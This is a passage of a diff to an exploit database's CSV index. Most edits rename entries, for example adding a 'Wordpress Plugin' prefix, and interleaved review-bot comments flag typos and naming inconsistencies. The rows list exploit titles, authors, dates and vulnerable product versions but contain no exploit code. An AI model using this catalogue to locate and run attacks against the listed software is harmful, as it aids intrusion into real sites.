34295,platforms/php/webapps/34295.txt,"RunCMS 2.1 - 'magpie_debug.php' Cross-Site Scripting",2010-07-11,"John Leitch",php,webapps,0
34296,platforms/php/webapps/34296.txt,"CSSTidy 1.3 - 'css_optimiser.php' Cross-Site Scripting",2010-07-11,"John Leitch",php,webapps,0
34297,platforms/multiple/remote/34297.txt,"dotDefender - Cross-Site Scripting Security Bypass",2010-07-09,SH4V,multiple,remote,0
@ -31085,7 +31095,7 @@ id,file,description,date,author,platform,type,port
34526,platforms/php/webapps/34526.pl,"vBulletin 4.0.x < 4.1.2 - (search.php cat Parameter) SQL Injection",2014-09-03,D35m0nd142,php,webapps,80
34426,platforms/linux/remote/34426.txt,"uzbl 'uzbl-core' - '@SELECTED_URI' Mouse Button Bindings Command Injection",2010-08-05,Chuzz,linux,remote,0
34427,platforms/linux/dos/34427.txt,"OpenSSL - 'ssl3_get_key_exchange()' Use-After-Free Memory Corruption",2010-08-07,"Georgi Guninski",linux,dos,0
34424,platforms/php/webapps/34424.txt,"WooCommerce Store Exporter 1.7.5 - Multiple Cross-Site Scripting Vulnerabilities",2014-08-27,"Mike Manzotti",php,webapps,0
34424,platforms/php/webapps/34424.txt,"Wordpress Plugin WooCommerce Store Exporter 1.7.5 - Multiple Cross-Site Scripting Vulnerabilities",2014-08-27,"Mike Manzotti",php,webapps,0
34428,platforms/windows/dos/34428.py,"Quintessential Media Player 5.0.121 - '.m3u' Buffer Overflow",2010-08-09,"Abhishek Lyall",windows,dos,0
34429,platforms/asp/webapps/34429.txt,"Allinta CMS 22.07.2010 - Multiple SQL Injections / Cross-Site Scripting Vulnerabilities",2010-08-09,"High-Tech Bridge SA",asp,webapps,0
34430,platforms/php/webapps/34430.txt,"Preation Eden Platform 27.7.2010 - Multiple HTML Injection Vulnerabilities",2010-08-09,"High-Tech Bridge SA",php,webapps,0
@ -31508,7 +31518,7 @@ id,file,description,date,author,platform,type,port
34894,platforms/php/webapps/34894.txt,"PHP Scripts Now Multiple Products - bios.php rank Parameter SQL Injection",2009-07-20,"599eme Man",php,webapps,0
34895,platforms/cgi/webapps/34895.rb,"Bash CGI - Remote Code Execution (Shellshock) (Metasploit)",2014-10-06,"Fady Mohammed Osman",cgi,webapps,0
34896,platforms/linux/remote/34896.py,"Postfix SMTP 4.2.x < 4.2.48 - Remote Exploit (Shellshock)",2014-10-06,"Phil Blank",linux,remote,0
34922,platforms/php/webapps/34922.txt,"Creative Contact Form 0.9.7 - Arbitrary File Upload",2014-10-08,"Gianni Angelozzi",php,webapps,0
34922,platforms/php/webapps/34922.txt,"Wordpress Plugin Creative Contact Form 0.9.7 - Arbitrary File Upload",2014-10-08,"Gianni Angelozzi",php,webapps,0
35023,platforms/php/webapps/35023.txt,"Wernhart Guestbook 2001.03.28 - Multiple SQL Injections",2010-11-29,"Aliaksandr Hartsuyeu",php,webapps,0
35024,platforms/php/webapps/35024.txt,"Joomla! Component Catalogue - SQL Injection / Local File Inclusion",2010-11-30,XroGuE,php,webapps,0
34900,platforms/linux/remote/34900.py,"Apache mod_cgi - Remote Exploit (Shellshock)",2014-10-06,"Federico Galatolo",linux,remote,0
@ -31861,7 +31871,7 @@ id,file,description,date,author,platform,type,port
35284,platforms/multiple/remote/35284.pl,"Opera Web Browser 11.00 - 'option' HTML Element Integer Overflow",2011-01-25,"C4SS!0 G0M3S",multiple,remote,0
35285,platforms/php/webapps/35285.txt,"WordPress Plugin Feature Slideshow 1.0.6 - 'src' Parameter Cross-Site Scripting",2011-01-24,"AutoSec Tools",php,webapps,0
35286,platforms/php/webapps/35286.txt,"WordPress Plugin BezahlCode Generator 1.0 - 'gen_name' Parameter Cross-Site Scripting",2011-01-25,"AutoSec Tools",php,webapps,0
35287,platforms/php/webapps/35287.txt,"Powerhouse Museum Collection Image Grid 0.9.1.1 - 'tbpv_username' Parameter Cross-Site Scripting",2011-01-24,"AutoSec Tools",php,webapps,0
35287,platforms/php/webapps/35287.txt,"Wordpress Plugin Powerhouse Museum Collection Image Grid 0.9.1.1 - 'tbpv_username' Parameter Cross-Site Scripting",2011-01-24,"AutoSec Tools",php,webapps,0
35274,platforms/php/webapps/35274.txt,"PHPFox - Persistent Cross-Site Scripting",2014-11-17,spyk2r,php,webapps,80
35275,platforms/xml/webapps/35275.txt,"Proticaret E-Commerce Script 3.0 - SQL Injection (2)",2014-11-17,"BGA Security",xml,webapps,80
35276,platforms/hardware/webapps/35276.txt,"ZTE ZXHN H108L - Authentication Bypass (2)",2014-11-17,"Project Zero Labs",hardware,webapps,80
@ -31875,7 +31885,7 @@ id,file,description,date,author,platform,type,port
35300,platforms/php/webapps/35300.txt,"WordPress Plugin TagNinja 1.0 - 'id' Parameter Cross-Site Scripting",2011-02-01,"AutoSec Tools",php,webapps,0
35301,platforms/php/webapps/35301.html,"Snowfox CMS 1.0 - Cross-Site Request Forgery (Add Admin)",2014-11-19,LiquidWorm,php,webapps,80
35302,platforms/linux/dos/35302.c,"MINIX 3.3.0 - Remote TCP/IP Stack Denial of Service",2014-11-19,nitr0us,linux,dos,31337
35303,platforms/php/webapps/35303.txt,"Paid Memberships Pro 1.7.14.2 - Directory Traversal",2014-11-19,"Kacper Szurek",php,webapps,80
35303,platforms/php/webapps/35303.txt,"Wordpress Plugin Paid Memberships Pro 1.7.14.2 - Directory Traversal",2014-11-19,"Kacper Szurek",php,webapps,80
35304,platforms/multiple/dos/35304.txt,"Oracle Java - Floating-Point Value Denial of Service",2011-02-01,"Konstantin Preisser",multiple,dos,0
35305,platforms/php/webapps/35305.txt,"ACollab - 't' Parameter SQL Injection",2011-02-01,"AutoSec Tools",php,webapps,0
35306,platforms/php/webapps/35306.txt,"TCExam 11.1.16 - 'user_password' Parameter Cross-Site Scripting",2011-02-02,"AutoSec Tools",php,webapps,0
@ -31920,7 +31930,7 @@ id,file,description,date,author,platform,type,port
35343,platforms/php/webapps/35343.txt,"Smarty Template Engine 2.6.9 - '$smarty.template' PHP Code Injection",2011-02-09,jonieske,php,webapps,0
35344,platforms/php/webapps/35344.txt,"RobotStats 1.0 - (robot Parameter) SQL Injection",2014-11-24,"ZoRLu Bugrahan",php,webapps,0
35345,platforms/hardware/dos/35345.txt,"TP-Link TL-WR740N - Denial Of Service",2014-11-24,LiquidWorm,hardware,dos,0
35346,platforms/php/webapps/35346.txt,"DukaPress 2.5.2 - Directory Traversal",2014-11-24,"Kacper Szurek",php,webapps,0
35346,platforms/php/webapps/35346.txt,"Wordpress Plugin DukaPress 2.5.2 - Directory Traversal",2014-11-24,"Kacper Szurek",php,webapps,0
35347,platforms/php/webapps/35347.txt,"Dokeos 1.8.6 2 - 'style' Parameter Cross-Site Scripting",2011-02-12,"AutoSec Tools",php,webapps,0
35348,platforms/php/webapps/35348.txt,"MG2 0.5.1 - Multiple Cross-Site Scripting Vulnerabilities",2011-02-15,LiquidWorm,php,webapps,0
35349,platforms/php/webapps/35349.txt,"Gollos 2.8 - Multiple Cross-Site Scripting Vulnerabilities",2011-02-15,"High-Tech Bridge SA",php,webapps,0
@ -32012,7 +32022,7 @@ id,file,description,date,author,platform,type,port
35444,platforms/php/webapps/35444.txt,"Lms Web Ensino - Multiple Input Validation Vulnerabilities",2011-03-04,waKKu,php,webapps,0
35445,platforms/linux/dos/35445.txt,"OpenLDAP 2.4.x - 'modrdn' NULL OldDN Remote Denial of Service",2011-01-03,"Serge Dubrouski",linux,dos,0
35446,platforms/windows/remote/35446.pl,"Microsoft Windows Movie Maker 2.1.4026 - '.avi' Remote Buffer Overflow",2011-03-10,KedAns-Dz,windows,remote,0
35447,platforms/php/webapps/35447.txt,"Google Document Embedder 2.5.16 - mysql_real_escpae_string Bypass SQL Injection",2014-12-03,"Securely (Yoo Hee man)",php,webapps,0
35447,platforms/php/webapps/35447.txt,"Wordpress Plugin Google Document Embedder 2.5.16 - mysql_real_escpae_string Bypass SQL Injection",2014-12-03,"Securely (Yoo Hee man)",php,webapps,0
35474,platforms/windows/remote/35474.py,"Microsoft Windows Kerberos - Elevation of Privilege (MS14-068)",2014-12-05,"Sylvain Monne",windows,remote,0
35449,platforms/windows/local/35449.rb,"BulletProof FTP Client 2010 - Buffer Overflow (SEH) (Ruby)",2014-12-03,"Muhamad Fadzil Ramli",windows,local,0
35450,platforms/linux/local/35450.txt,"VFU 4.10-1.1 - Buffer Overflow",2014-12-03,"Juan Sacco",linux,local,0
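Review bot: The new Google Document Embedder description still says `mysql_real_escpae_string`; if it refers to PHP's `mysql_real_escape_string` (which the "Bypass" wording implies) the function name is misspelled and will not match searches for the real function. Suggest `WordPress Plugin Google Document Embedder 2.5.16 - mysql_real_escape_string Bypass SQL Injection`, using the `WordPress Plugin` prefix spelled as the rest of the index does. If the misspelling is deliberately preserved from the original advisory title, saying so in the commit message would stop it being "fixed" later.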
@ -32598,7 +32608,7 @@ id,file,description,date,author,platform,type,port
36083,platforms/php/webapps/36083.txt,"Simple Machines Forum 1.1.14/2.0 - '[img]' BBCode Tag Cross-Site Request Forgery",2011-08-25,"Christian Yerena",php,webapps,0
36084,platforms/php/webapps/36084.html,"Mambo CMS 4.6.5 - 'index.php' Cross-Site Request Forgery",2011-08-26,Caddy-Dz,php,webapps,0
36085,platforms/php/webapps/36085.txt,"phpWebSite 1.7.1 - 'mod.php' SQL Injection",2011-08-27,Ehsan_Hp200,php,webapps,0
36086,platforms/php/webapps/36086.txt,"WonderPlugin Audio Player 2.0 - Blind SQL Injection / Cross-Site Scripting",2015-02-16,"Kacper Szurek",php,webapps,0
36086,platforms/php/webapps/36086.txt,"Wordpress Plugin WonderPlugin Audio Player 2.0 - Blind SQL Injection / Cross-Site Scripting",2015-02-16,"Kacper Szurek",php,webapps,0
36087,platforms/php/webapps/36087.txt,"WordPress Plugin Fancybox 3.0.2 - Persistent Cross-Site Scripting",2015-02-16,NULLpOint7r,php,webapps,0
36089,platforms/php/webapps/36089.txt,"eTouch SamePage 4.4.0.0.239 - Multiple Vulnerabilities",2015-02-16,"Brandon Perry",php,webapps,80
36090,platforms/php/webapps/36090.txt,"ClickCMS - Denial of Service / CAPTCHA Bypass",2011-08-29,MustLive,php,webapps,0
@ -32623,7 +32633,7 @@ id,file,description,date,author,platform,type,port
36109,platforms/php/webapps/36109.txt,"Mambo CMS N-Myndir Component - SQL Injection",2011-09-02,CoBRa_21,php,webapps,0
36110,platforms/php/webapps/36110.txt,"ACal 2.2.6 - 'calendar.php' Cross-Site Scripting",2011-09-02,T0xic,php,webapps,0
36111,platforms/windows/remote/36111.py,"Cerberus FTP Server 4.0.9.8 - Remote Buffer Overflow",2011-09-05,KedAns-Dz,windows,remote,0
36112,platforms/php/webapps/36112.txt,"Duplicator 0.5.8 - Privilege Escalation",2015-02-18,"Kacper Szurek",php,webapps,80
36112,platforms/php/webapps/36112.txt,"Wordpress Plugin Duplicator 0.5.8 - Privilege Escalation",2015-02-18,"Kacper Szurek",php,webapps,80
36113,platforms/php/webapps/36113.txt,"YABSoft Advanced Image Hosting Script 2.3 - 'report.php' Cross-Site Scripting",2011-09-05,R3d-D3V!L,php,webapps,0
36114,platforms/php/webapps/36114.txt,"EasyGallery 5 - 'index.php' Multiple SQL Injection",2011-09-05,"Eyup CELIK",php,webapps,0
36115,platforms/windows/remote/36115.txt,"Apple QuickTime 7.6.9 - 'QuickTimePlayer.dll' ActiveX Buffer Overflow",2011-09-06,"Ivan Sanchez",windows,remote,0
@ -33106,7 +33116,7 @@ id,file,description,date,author,platform,type,port
36615,platforms/php/webapps/36615.txt,"WordPress Plugin Simple Ads Manager - Information Disclosure",2015-04-02,"ITAS Team",php,webapps,80
36616,platforms/php/webapps/36616.txt,"phpSFP - Schedule Facebook Posts 1.5.6 SQL Injection",2015-04-02,@u0x,php,webapps,80
36617,platforms/php/webapps/36617.txt,"WordPress Plugin VideoWhisper Video Presentation 3.31.17 - Arbitrary File Upload",2015-04-02,"Larry W. Cashdollar",php,webapps,80
36618,platforms/php/webapps/36618.txt,"VideoWhisper Video Conference Integration 4.91.8 - Arbitrary File Upload",2015-04-02,"Larry W. Cashdollar",php,webapps,80
36618,platforms/php/webapps/36618.txt,"Wordpress Plugin VideoWhisper Video Conference Integration 4.91.8 - Arbitrary File Upload",2015-04-02,"Larry W. Cashdollar",php,webapps,80
36619,platforms/linux/webapps/36619.txt,"Ericsson Drutt MSDP (Instance Monitor) - Directory Traversal",2015-04-02,"Anastasios Monachos",linux,webapps,0
36621,platforms/php/webapps/36621.txt,"glFusion 1.x - SQL Injection",2012-01-24,KedAns-Dz,php,webapps,0
36622,platforms/windows/dos/36622.pl,"UltraPlayer 2.112 Malformed - '.avi' File Denial of Service",2012-01-24,KedAns-Dz,windows,dos,0
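Review bot: The renamed VideoWhisper Video Conference Integration line uses `Wordpress Plugin` while the sibling VideoWhisper Video Presentation entry directly above it (36617) uses `WordPress Plugin`, so two entries for the same vendor in the same hunk now carry different prefixes. Suggest `WordPress Plugin VideoWhisper Video Conference Integration 4.91.8 - Arbitrary File Upload`.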
@ -33160,7 +33170,7 @@ id,file,description,date,author,platform,type,port
36671,platforms/php/webapps/36671.txt,"WordPress Plugin All In One WP Security & Firewall 3.9.0 - SQL Injection",2015-04-08,"Claudio Viviani",php,webapps,80
36672,platforms/lin_x86/shellcode/36672.asm,"Linux/x86 - Egg-hunter Shellcode (20 bytes)",2015-04-08,"Paw Petersen",lin_x86,shellcode,0
36673,platforms/lin_x86/shellcode/36673.py,"Linux/x86 - Typewriter Shellcode (Generator)",2015-04-08,"Paw Petersen",lin_x86,shellcode,0
36674,platforms/php/webapps/36674.txt,"Shareaholic 7.6.0.3 - Cross-Site Scripting",2015-04-08,"Kacper Szurek",php,webapps,80
36674,platforms/php/webapps/36674.txt,"Wordpress Plugin Shareaholic 7.6.0.3 - Cross-Site Scripting",2015-04-08,"Kacper Szurek",php,webapps,80
36675,platforms/php/webapps/36675.txt,"Balero CMS 0.7.2 - Multiple Blind SQL Injection",2015-04-08,LiquidWorm,php,webapps,80
36676,platforms/php/webapps/36676.html,"Balero CMS 0.7.2 - Multiple JS/HTML Injection Vulnerabilities",2015-04-08,LiquidWorm,php,webapps,80
36677,platforms/php/webapps/36677.txt,"WordPress Plugin Traffic Analyzer 3.4.2 - Blind SQL Injection",2015-04-08,"Dan King",php,webapps,80
@ -33556,7 +33566,7 @@ id,file,description,date,author,platform,type,port
37096,platforms/php/webapps/37096.html,"Anchor CMS 0.6-14-ga85d0a0 - 'id' Parameter Multiple HTML Injection Vulnerabilities",2012-04-20,"Gjoko Krstic",php,webapps,0
37097,platforms/ios/remote/37097.py,"FTP Media Server 3.0 - Authentication Bypass / Denial of Service",2015-05-25,"Wh1t3Rh1n0 (Michael Allen)",ios,remote,0
37098,platforms/windows/local/37098.txt,"Microsoft Windows - Privilege Escalation (MS15-010)",2015-05-25,"Sky lake",windows,local,0
37253,platforms/php/webapps/37253.txt,"Paypal Currency Converter Basic For WooCommerce - File Read",2015-06-10,Kuroi'SH,php,webapps,0
37253,platforms/php/webapps/37253.txt,"Wordpress Plugin Paypal Currency Converter Basic For WooCommerce - File Read",2015-06-10,Kuroi'SH,php,webapps,0
37254,platforms/php/webapps/37254.txt,"WordPress Plugin History Collection 1.1.1 - Arbitrary File Download",2015-06-10,Kuroi'SH,php,webapps,80
37255,platforms/php/webapps/37255.txt,"Pandora FMS 5.0/5.1 - Authentication Bypass",2015-06-10,"Manuel Mancera",php,webapps,0
37100,platforms/php/webapps/37100.txt,"Waylu CMS - 'products_xx.php' SQL Injection / HTML Injection",2012-04-20,TheCyberNuxbie,php,webapps,0
@ -33572,7 +33582,7 @@ id,file,description,date,author,platform,type,port
37110,platforms/java/webapps/37110.py,"Apache JackRabbit - WebDAV XXE Exploit",2015-05-26,"Mikhail Egorov",java,webapps,8080
37111,platforms/php/webapps/37111.txt,"WordPress Plugin MailChimp Subscribe Forms 1.1 - Remote Code Execution",2015-05-26,woodspeed,php,webapps,80
37112,platforms/php/webapps/37112.txt,"WordPress Plugin church_admin 0.800 - Persistent Cross-Site Scripting",2015-05-26,woodspeed,php,webapps,80
37113,platforms/php/webapps/37113.txt,"Wordpess Simple Photo Gallery 1.7.8 - Blind SQL Injection",2015-05-26,woodspeed,php,webapps,80
37113,platforms/php/webapps/37113.txt,"Wordpress Plugin Simple Photo Gallery 1.7.8 - Blind SQL Injection",2015-05-26,woodspeed,php,webapps,80
37114,platforms/jsp/webapps/37114.txt,"Sendio ESP - Information Disclosure",2015-05-26,"Core Security",jsp,webapps,80
37115,platforms/perl/webapps/37115.txt,"ClickHeat 1.13+ - Remote Command Execution",2015-05-26,"Calum Hutton",perl,webapps,0
37116,platforms/php/webapps/37116.py,"Silverstripe CMS 2.4.7 - install.php PHP Code Injection",2012-04-27,"Mehmet Ince",php,webapps,0
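Review bot: The fix of `Wordpess` to `Wordpress Plugin` on the Simple Photo Gallery line stops one step short: the two entries immediately above it (MailChimp Subscribe Forms 37111 and church_admin 37112) spell the prefix `WordPress Plugin`, so the corrected line is still the odd one out in its own hunk. Suggest `WordPress Plugin Simple Photo Gallery 1.7.8 - Blind SQL Injection`.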
@ -33628,13 +33638,13 @@ id,file,description,date,author,platform,type,port
37168,platforms/linux/local/37168.txt,"PonyOS 3.0 - ELF Loader Privilege Escalation",2015-06-01,"Hacker Fantastic",linux,local,0
37171,platforms/hardware/remote/37171.rb,"D-Link Devices - HNAP SOAPAction-Header Command Execution (Metasploit)",2015-06-01,Metasploit,hardware,remote,0
37172,platforms/hardware/webapps/37172.txt,"Aruba ClearPass Policy Manager - Persistent Cross-Site Scripting",2015-06-01,"Cristiano Maruti",hardware,webapps,0
37173,platforms/php/webapps/37173.txt,"Download Monitor 3.3.5.4 - 'uploader.php' Multiple Cross-Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",php,webapps,0
37173,platforms/php/webapps/37173.txt,"Wordpress Plugin Download Monitor 3.3.5.4 - 'uploader.php' Multiple Cross-Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",php,webapps,0
37174,platforms/php/webapps/37174.txt,"WordPress Plugin Network Publisher 5.0.1 - 'networkpub_key' Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0
37175,platforms/php/webapps/37175.txt,"Download Manager 2.2.2 - 'cid' Parameter Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0
37176,platforms/php/webapps/37176.txt,"PDF & Print Button Joliprint 1.3.0 - Multiple Cross-Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",php,webapps,0
37175,platforms/php/webapps/37175.txt,"Wordpress Plugin Download Manager 2.2.2 - 'cid' Parameter Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0
37176,platforms/php/webapps/37176.txt,"Wordpress Plugin PDF & Print Button Joliprint 1.3.0 - Multiple Cross-Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",php,webapps,0
37177,platforms/php/webapps/37177.txt,"WordPress Plugin CataBlog 1.6 - 'admin.php' Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0
37178,platforms/php/webapps/37178.txt,"2 Click Social Media Buttons 0.32.2 - Multiple Cross-Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",php,webapps,0
37179,platforms/php/webapps/37179.txt,"iFrame Admin Pages 0.1 - 'main_page.php' Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0
37178,platforms/php/webapps/37178.txt,"Wordpress Plugin 2 Click Social Media Buttons 0.32.2 - Multiple Cross-Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",php,webapps,0
37179,platforms/php/webapps/37179.txt,"Wordpress Plugin iFrame Admin Pages 0.1 - 'main_page.php' Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0
37180,platforms/php/webapps/37180.txt,"WordPress Plugin NewsLetter Manager 1.0 - Multiple Cross-Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",php,webapps,0
37184,platforms/hardware/remote/37184.py,"Seagate Central 2014.0410.0026-F - Remote Root Exploit",2015-06-03,"Jeremy Brown",hardware,remote,0
37185,platforms/hardware/webapps/37185.py,"Seagate Central 2014.0410.0026-F - Remote Facebook Access Token Exploit",2015-06-03,"Jeremy Brown",hardware,webapps,0
@ -33642,19 +33652,19 @@ id,file,description,date,author,platform,type,port
37183,platforms/linux/local/37183.c,"PonyOS 3.0 - tty ioctl() Local Kernel Exploit",2015-06-02,"Hacker Fantastic",linux,local,0
37187,platforms/windows/dos/37187.py,"Jildi FTP Client - Buffer Overflow (PoC)",2015-06-03,metacom,windows,dos,21
37188,platforms/windows/dos/37188.txt,"WebDrive 12.2 (B4172) - Buffer Overflow",2015-06-03,Vulnerability-Lab,windows,dos,0
37189,platforms/php/webapps/37189.txt,"Media Library Categories - Multiple Cross-Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",php,webapps,0
37190,platforms/php/webapps/37190.txt,"LeagueManager 3.7 - Multiple Cross-Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",php,webapps,0
37189,platforms/php/webapps/37189.txt,"Wordpress Plugin Media Library Categories - Multiple Cross-Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",php,webapps,0
37190,platforms/php/webapps/37190.txt,"Wordpress Plugin LeagueManager 3.7 - Multiple Cross-Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",php,webapps,0
37191,platforms/php/webapps/37191.txt,"WordPress Plugin Leaflet Maps Marker 0.0.1 - leaflet_layer.php id Parameter Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0
37192,platforms/php/webapps/37192.txt,"WordPress Plugin Leaflet Maps Marker 0.0.1 for - leaflet_marker.php id Parameter Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0
37193,platforms/php/webapps/37193.txt,"GD Star Rating 1.9.16 - 'tpl_section' Parameter Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0
37194,platforms/php/webapps/37194.txt,"Mingle Forum 1.0.33 - 'admin.php' Multiple Cross-Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",php,webapps,0
37193,platforms/php/webapps/37193.txt,"Wordpress Plugin GD Star Rating 1.9.16 - 'tpl_section' Parameter Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0
37194,platforms/php/webapps/37194.txt,"Wordpress Plugin ]Mingle Forum 1.0.33 - 'admin.php' Multiple Cross-Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",php,webapps,0
37195,platforms/php/webapps/37195.txt,"WordPress Plugin WP Forum Server 1.7.3 - fs-admin/fs-admin.php Multiple Parameter Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0
37196,platforms/php/webapps/37196.txt,"WordPress Plugin Pretty Link Lite 1.5.2 - SQL Injection / Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0
37198,platforms/multiple/remote/37198.rb,"JDownloader 2 Beta - Directory Traversal",2015-06-04,PizzaHatHacker,multiple,remote,0
37199,platforms/hardware/dos/37199.txt,"ZTE AC 3633R USB Modem - Multiple Vulnerabilities",2015-06-04,Vishnu,hardware,dos,0
37200,platforms/php/webapps/37200.txt,"WordPress Plugin zM Ajax Login & Register 1.0.9 - Local File Inclusion",2015-06-04,"Panagiotis Vagenas",php,webapps,80
37201,platforms/php/webapps/37201.txt,"WordPress Plugin Sharebar 1.2.1 - SQL Injection / Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0
37202,platforms/php/webapps/37202.txt,"Share and Follow 1.80.3 - 'admin.php' Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0
37202,platforms/php/webapps/37202.txt,"Wordpress Plugin Share and Follow 1.80.3 - 'admin.php' Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0
37203,platforms/php/webapps/37203.txt,"WordPress Plugin Soundcloud Is Gold 2.1 - 'width' Parameter Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0
37204,platforms/php/webapps/37204.txt,"WordPress Plugin Track That Stat 1.0.8 - Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0
37205,platforms/php/webapps/37205.txt,"LongTail JW Player - 'debug' Parameter Cross-Site Scripting",2012-05-16,gainover,php,webapps,0
@ -34013,7 +34023,7 @@ id,file,description,date,author,platform,type,port
37597,platforms/hardware/remote/37597.rb,"Accellion FTA - getStatus verify_oauth_token Command Execution (Metasploit)",2015-07-13,Metasploit,hardware,remote,443
37598,platforms/multiple/remote/37598.rb,"VNC Keyboard - Remote Code Execution (Metasploit)",2015-07-13,Metasploit,multiple,remote,5900
37599,platforms/windows/remote/37599.rb,"Adobe Flash - opaqueBackground Use-After-Free (Metasploit)",2015-07-13,Metasploit,windows,remote,0
37600,platforms/multiple/remote/37600.rb,"Western Digital Arkeia - Remote Code Execution (Metasploit)",2015-07-13,Metasploit,multiple,remote,617
37600,platforms/multiple/remote/37600.rb,"Western Digital Arkeia - Remote Code Execution (Metasploit) (2)",2015-07-13,Metasploit,multiple,remote,617
37601,platforms/php/webapps/37601.txt,"WordPress Plugin Swim Team 1.44.10777 - Arbitrary File Download",2015-07-13,"Larry W. Cashdollar",php,webapps,80
37602,platforms/php/webapps/37602.txt,"ZenPhoto 1.4.8 - Multiple Vulnerabilities",2015-07-13,"Tim Coen",php,webapps,80
37603,platforms/php/webapps/37603.txt,"WordPress Plugin CP Contact Form with Paypal 1.1.5 - Multiple Vulnerabilities",2015-07-13,"Nitin Venkatesh",php,webapps,80
@ -34541,7 +34551,7 @@ id,file,description,date,author,platform,type,port
38164,platforms/hardware/remote/38164.py,"Belkin Wireless Router Default - WPS PIN Security",2013-01-03,ZhaoChunsheng,hardware,remote,0
38165,platforms/windows/dos/38165.txt,"IKEView.exe Fox Beta 1 - Stack Buffer Overflow",2015-09-13,hyp3rlinx,windows,dos,0
38166,platforms/php/webapps/38166.txt,"WHMCS 5.0 - Insecure Cookie Authentication Bypass",2012-12-31,Agd_Scorp,php,webapps,0
38167,platforms/php/webapps/38167.php,"Multiple WordPress Themes WPScientist - Arbitrary File Upload",2013-01-04,JingoBD,php,webapps,0
38167,platforms/php/webapps/38167.php,"Multiple WordPress WPScientist Themes - Arbitrary File Upload",2013-01-04,JingoBD,php,webapps,0
38168,platforms/php/webapps/38168.txt,"TomatoCart - 'json.php' Security Bypass",2013-01-04,"Aung Khant",php,webapps,0
38169,platforms/php/webapps/38169.txt,"Havalite CMS - 'comment' Parameter HTML Injection",2013-01-06,"Henri Salo",php,webapps,0
38170,platforms/android/remote/38170.txt,"Facebook for Android - 'LoginActivity' Information Disclosure",2013-01-07,"Takeshi Terada",android,remote,0
@ -34551,7 +34561,7 @@ id,file,description,date,author,platform,type,port
38174,platforms/multiple/webapps/38174.txt,"ManageEngine OpManager 11.5 - Multiple Vulnerabilities",2015-09-14,xistence,multiple,webapps,0
38179,platforms/multiple/remote/38179.txt,"Dell OpenManage Server Administrator - Cross-Site Scripting",2013-01-09,"Tenable NS",multiple,remote,0
38180,platforms/php/webapps/38180.txt,"tinybrowser - /tiny_mce/plugins/tinybrowser/edit.php type Parameter Cross-Site Scripting",2013-01-09,MustLive,php,webapps,0
38176,platforms/php/webapps/38176.txt,"EZ SQL Reports < 4.11.37 - Multiple Vulnerabilities",2015-09-14,"Felipe Molina",php,webapps,0
38176,platforms/php/webapps/38176.txt,"Wordpress Plugin EZ SQL Reports < 4.11.37 - Multiple Vulnerabilities",2015-09-14,"Felipe Molina",php,webapps,0
38177,platforms/windows/dos/38177.txt,"IKEView.exe R60 - Stack Buffer Overflow",2015-09-14,hyp3rlinx,windows,dos,0
38181,platforms/php/webapps/38181.txt,"tinybrowser - /tiny_mce/plugins/tinybrowser/upload.php type Parameter Cross-Site Scripting",2013-01-09,MustLive,php,webapps,0
38182,platforms/php/webapps/38182.txt,"tinybrowser - /tiny_mce/plugins/tinybrowser/tinybrowser.php type Parameter Cross-Site Scripting",2013-01-09,MustLive,php,webapps,0
@ -34746,7 +34756,7 @@ id,file,description,date,author,platform,type,port
38381,platforms/windows/local/38381.py,"WinRar < 5.30 Beta 4 - Settings Import Command Execution",2015-10-02,R-73eN,windows,local,0
38382,platforms/windows/local/38382.py,"ASX to MP3 Converter 1.82.50 - '.asx' Stack Overflow",2015-10-02,ex_ptr,windows,local,0
38383,platforms/linux/webapps/38383.py,"ElasticSearch 1.6.0 - Arbitrary File Download",2015-10-02,"Pedro Andujar",linux,webapps,9200
38384,platforms/windows/remote/38384.txt,"Avast AntiVirus - X.509 Error Rendering Command Execution",2015-10-02,"Google Security Research",windows,remote,0
38384,platforms/windows/remote/38384.txt,"Avast! AntiVirus - X.509 Error Rendering Command Execution",2015-10-02,"Google Security Research",windows,remote,0
38385,platforms/php/webapps/38385.txt,"KindEditor - Multiple Arbitrary File Upload Vulnerabilities",2013-03-11,KedAns-Dz,php,webapps,0
38386,platforms/php/webapps/38386.txt,"PHPBoost - Arbitrary File Upload / Information Disclosure",2013-03-11,KedAns-Dz,php,webapps,0
38387,platforms/multiple/remote/38387.txt,"RubyGems fastreader - 'entry_controller.rb' Remote Command Execution",2013-03-12,"Larry W. Cashdollar",multiple,remote,0
@ -34957,7 +34967,7 @@ id,file,description,date,author,platform,type,port
38605,platforms/php/webapps/38605.txt,"Nameko - 'nameko.php' Cross-Site Scripting",2013-06-29,"Andrea Menin",php,webapps,0
38606,platforms/php/webapps/38606.txt,"WordPress Plugin WP Private Messages - 'msgid' Parameter SQL Injection",2013-06-29,"IeDb ir",php,webapps,0
38607,platforms/php/webapps/38607.txt,"Atomy Maxsite - 'index.php' Arbitrary File Upload",2013-06-30,Iranian_Dark_Coders_Team,php,webapps,0
